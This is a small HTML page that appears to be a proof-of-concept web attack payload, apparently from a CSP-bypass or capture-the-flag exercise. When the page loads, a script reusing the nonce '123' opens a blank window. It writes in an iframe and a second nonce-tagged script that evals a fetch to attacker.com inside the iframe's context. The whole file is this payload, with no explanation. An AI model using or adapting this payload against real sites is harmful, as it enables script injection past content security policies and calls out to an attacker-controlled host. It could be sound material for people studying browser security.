<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<script nonce='123'>
window.onload = function() {
    w=window.open("about:blank"); w.document.write("<iframe id=GGGWDKdeGGG src=about:blank><\/iframe><script nonce=123>GGGWDKdeGGG.onload=_=>GGGWDKdeGGG.contentWindow.eval('fetch(`https://attacker.com/report/report`)');GGGWDKdeGGG.contentWindow.location.reload();<\/script>");
};
</script>
</body>
</html>